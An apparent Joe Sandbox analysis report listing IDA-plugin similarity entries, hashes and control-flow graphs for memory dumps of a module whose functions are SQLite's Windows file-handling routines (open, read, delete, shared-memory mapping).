                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                                                                          • API String ID: 0-534082081
                                                                                                                                                                                                          • Opcode ID: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                                          • Instruction ID: 7d9c9c7861fff4edfa13e3a6a2a17af6b6df2a27e99f6e43ebe65656e9c2a311
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5426E25B1AB8385EB549F25A860A7937A1FF84B88F448135C96E077FDCF3CE9458B40
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                          • API String ID: 0-3486433936
                                                                                                                                                                                                          • Opcode ID: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                                          • Instruction ID: ed7a270e2f73428f56087c706c0cc6a755acf409b9f57324e7c137fbb5a69afd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBD28C32B0AB8386EB618B15D160BB9B7A0FB48BD4F059235DA6D077F9DF38E4558700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                          • API String ID: 823142352-3829269058
                                                                                                                                                                                                          • Opcode ID: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                                          • Instruction ID: 5c80ddd70ad01a736e6c1fcc64f17374b86fe58110c8b63cf7fc0120910bf068
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1325F61B1AB4786FB588B26A864B7577A0EF85B64F044635DE7E036F8CF3CE4458B00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: :memory:
                                                                                                                                                                                                          • API String ID: 0-2920599690
                                                                                                                                                                                                          • Opcode ID: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                                          • Instruction ID: 8bbfd7ad2416395bc16717c8a55910812cc26af5ddb753939b63fb46ea3ffd59
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B329E62B0AB8782EB658B25D560B7937A0FF88B84F094535DA6D437F8DF3CE4958300
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                          • Opcode ID: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                                          • Instruction ID: de832b42984717769e61ea2fe5c2f761643c75e0f0fde66a8b00b367dfcba150
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B1B665B2BB0795FF588B65E860D7422A4AFC8B44F144836C93E077F8DF2DE6918B40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                          • Instruction ID: ff0eea79eff7eb3e8eb699a96b8ed5cb8e1b9575a7c5f406ecb7323de6f03e90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32C19F22B2B78355FB558B29D420BB92791EFC5B88F096036D96E473FDDE6CD4418340

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 972 7ffdfb725320-7ffdfb72534c 973 7ffdfb72534e call 7ffdfb861dd0 972->973 974 7ffdfb725361-7ffdfb72536a 972->974 980 7ffdfb725353-7ffdfb725357 973->980 976 7ffdfb725379-7ffdfb72537d 974->976 977 7ffdfb72536c 974->977 978 7ffdfb72537f-7ffdfb72538b call 7ffdfb861840 976->978 979 7ffdfb725395-7ffdfb725398 976->979 977->976 988 7ffdfb725611-7ffdfb725614 978->988 989 7ffdfb725391 978->989 982 7ffdfb72539e-7ffdfb7253e8 979->982 983 7ffdfb725616-7ffdfb725633 979->983 984 7ffdfb72535d 980->984 985 7ffdfb72566a-7ffdfb725676 980->985 995 7ffdfb72541f-7ffdfb725421 982->995 996 7ffdfb7253ea-7ffdfb7253f9 982->996 987 7ffdfb725638-7ffdfb725647 983->987 984->974 990 7ffdfb725653-7ffdfb725659 987->990 991 7ffdfb725649-7ffdfb725650 987->991 988->983 988->987 989->979 993 7ffdfb725668 990->993 994 7ffdfb72565b 990->994 991->990 993->985 994->993 997 7ffdfb725423-7ffdfb725451 call 7ffdfb861a30 995->997 998 7ffdfb725456-7ffdfb72545c 995->998 996->995 1006 7ffdfb7253fb-7ffdfb72541d call 7ffdfb861a30 996->1006 1004 7ffdfb7255fd-7ffdfb72560c 997->1004 999 7ffdfb7254ae-7ffdfb7254c4 call 7ffdfb734be0 998->999 1000 7ffdfb72545e-7ffdfb725466 998->1000 1011 7ffdfb7254d0-7ffdfb725502 999->1011 1012 7ffdfb7254c6-7ffdfb7254cb 999->1012 1000->1004 1005 7ffdfb72546c-7ffdfb725470 call 7ffdfb723a80 1000->1005 1004->988 1014 7ffdfb725475-7ffdfb725479 1005->1014 1006->995 1011->1004 1016 7ffdfb725508 1011->1016 1012->1004 1014->999 1017 7ffdfb72547b-7ffdfb7254a9 call 7ffdfb861a30 1014->1017 1018 7ffdfb725510-7ffdfb725539 CreateFileMappingW 1016->1018 1017->1004 1019 7ffdfb7255b4-7ffdfb7255eb call 7ffdfb861a30 1018->1019 1020 7ffdfb72553b-7ffdfb72557f MapViewOfFile 1018->1020 1019->1004 1029 7ffdfb7255ed-7ffdfb7255f4 1019->1029 1020->1019 1022 7ffdfb725581-7ffdfb7255ac 1020->1022 1022->1018 1024 7ffdfb7255b2 1022->1024 1024->1004 1029->1004
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                                                                                                          • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                          • API String ID: 3452162329-2257004166
                                                                                                                                                                                                          • Opcode ID: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                                          • Instruction ID: 4a695b0bf39ef89901addd354909031942248bc31ff440a153ddeb7a995d6cf8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71918072B1AB4386EB248F25D460A6937A2FF84B94F458135CE6D877B9DF3CD8418B00

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1438 7ffdfb723a80-7ffdfb723a9a 1439 7ffdfb723aae-7ffdfb723ab4 1438->1439 1440 7ffdfb723a9c-7ffdfb723aad 1438->1440 1441 7ffdfb723ab6-7ffdfb723ac7 1439->1441 1442 7ffdfb723aca-7ffdfb723ad3 1439->1442 1441->1442 1443 7ffdfb723ad5-7ffdfb723ad9 1442->1443 1444 7ffdfb723adb 1442->1444 1445 7ffdfb723ade-7ffdfb723b13 call 7ffdfb862700 SetFilePointer 1443->1445 1444->1445 1448 7ffdfb723b15-7ffdfb723b24 1445->1448 1449 7ffdfb723b59-7ffdfb723b6c SetEndOfFile 1445->1449 1448->1449 1457 7ffdfb723b26-7ffdfb723b57 call 7ffdfb861a30 1448->1457 1450 7ffdfb723b6e-7ffdfb723b80 1449->1450 1451 7ffdfb723bab-7ffdfb723bae 1449->1451 1450->1451 1461 7ffdfb723b82-7ffdfb723b8c 1450->1461 1452 7ffdfb723bb0-7ffdfb723bbd 1451->1452 1453 7ffdfb723bc7-7ffdfb723bdd 1451->1453 1455 7ffdfb723bbf 1452->1455 1456 7ffdfb723bc2 call 7ffdfb861b10 1452->1456 1455->1456 1456->1453 1463 7ffdfb723b91-7ffdfb723ba9 call 7ffdfb861a30 1457->1463 1461->1463 1463->1451 1463->1453
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                          • API String ID: 973152223-2471937615
                                                                                                                                                                                                          • Opcode ID: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                          • Instruction ID: c854bdfa22343e2b1454b58fbf4d64578126ef41dbac9f59143835ec630d10f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41D121B1AB038AE7549F69E46096973B1EB84B94B154136DE2D877FCDF3CD8428B40

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1747 7ffdfb724d70-7ffdfb724d99 call 7ffdfb8628d0 1750 7ffdfb724da5-7ffdfb724dbd GetFileAttributesW 1747->1750 1751 7ffdfb724d9b-7ffdfb724da0 1747->1751 1753 7ffdfb724e50-7ffdfb724e65 1750->1753 1754 7ffdfb724dc3-7ffdfb724dcd 1750->1754 1752 7ffdfb724ed1-7ffdfb724ee5 1751->1752 1758 7ffdfb724e67-7ffdfb724e87 call 7ffdfb861a30 1753->1758 1759 7ffdfb724e8d 1753->1759 1755 7ffdfb724dd0-7ffdfb724dd2 1754->1755 1757 7ffdfb724dd8-7ffdfb724dea DeleteFileW 1755->1757 1755->1758 1760 7ffdfb724df0-7ffdfb724e03 1757->1760 1761 7ffdfb724e92-7ffdfb724e94 1757->1761 1763 7ffdfb724ec2-7ffdfb724ecf call 7ffdfb734c20 1758->1763 1759->1761 1769 7ffdfb724e89-7ffdfb724e8b 1760->1769 1770 7ffdfb724e09-7ffdfb724e0f 1760->1770 1761->1763 1764 7ffdfb724e96-7ffdfb724ebd call 7ffdfb748730 1761->1764 1763->1752 1764->1763 1769->1758 1772 7ffdfb724e11-7ffdfb724e15 1770->1772 1773 7ffdfb724e17-7ffdfb724e1a 1770->1773 1772->1773 1774 7ffdfb724e23-7ffdfb724e4e 1772->1774 1773->1774 1775 7ffdfb724e1c-7ffdfb724e21 1773->1775 1774->1753 1774->1755 1775->1769 1775->1774
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesDelete
                                                                                                                                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                          • API String ID: 2910425767-1405699761
                                                                                                                                                                                                          • Opcode ID: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                                          • Instruction ID: 650cd3967ba12ea07f6a16fae8ff845c8c9fc104ba121ca8ea5db2d314a6ca95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE416B21F1AB4396FB189B26A860C7872A1EF94B90F544535DE3E477F8CF2CE9458B40

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1889 7ffdfb7236f0-7ffdfb72371b 1890 7ffdfb72371d-7ffdfb723732 1889->1890 1891 7ffdfb72376b-7ffdfb723798 1889->1891 1892 7ffdfb723754-7ffdfb723768 call 7ffdfb86cf10 1890->1892 1893 7ffdfb723734 call 7ffdfb86cf10 1890->1893 1894 7ffdfb7237a0-7ffdfb7237cb ReadFile 1891->1894 1892->1891 1899 7ffdfb723739 1893->1899 1897 7ffdfb7237d1-7ffdfb7237e1 1894->1897 1898 7ffdfb723858-7ffdfb72385a 1894->1898 1897->1898 1908 7ffdfb7237e3-7ffdfb7237f6 1897->1908 1901 7ffdfb723888-7ffdfb723891 1898->1901 1902 7ffdfb72385c-7ffdfb723883 call 7ffdfb748730 1898->1902 1904 7ffdfb72373b-7ffdfb723753 1899->1904 1901->1899 1903 7ffdfb723897-7ffdfb7238ac call 7ffdfb86d5c0 1901->1903 1902->1901 1903->1904 1911 7ffdfb723830-7ffdfb723853 call 7ffdfb861a30 1908->1911 1912 7ffdfb7237f8-7ffdfb7237fe 1908->1912 1911->1904 1913 7ffdfb723800-7ffdfb723804 1912->1913 1914 7ffdfb723806-7ffdfb723809 1912->1914 1913->1914 1916 7ffdfb723812-7ffdfb72382b 1913->1916 1914->1916 1917 7ffdfb72380b-7ffdfb723810 1914->1917 1916->1894 1917->1911 1917->1916
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                          • API String ID: 2738559852-1843600136
                                                                                                                                                                                                          • Opcode ID: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                          • Instruction ID: d77c77b3dec259f969a08a60aad8ed187bf5e75d7de2404a2735c8be8214d458
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0141B032B2AB4386E7149F15E494DA97761FB84B80F464136DE6E477B8CF3CE4418B40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                          • Instruction ID: 8d868997632a6661e13b28a2dba49a6054117ec21b2b5d8d5ab090ccb4f93931
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47D19362B2968786EB548F25D4A0B3937A1EBC4B94F045035DA6E877F8DF3DE885C700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FFDFB8822A2,?,?,?,00007FFDFB8822DF,?,?,00000000,00007FFDFB87FE4D,?,?,?,00007FFDFB87FD7F), ref: 00007FFDFB879982
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FFDFB8822A2,?,?,?,00007FFDFB8822DF,?,?,00000000,00007FFDFB87FE4D,?,?,?,00007FFDFB87FD7F), ref: 00007FFDFB87998C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
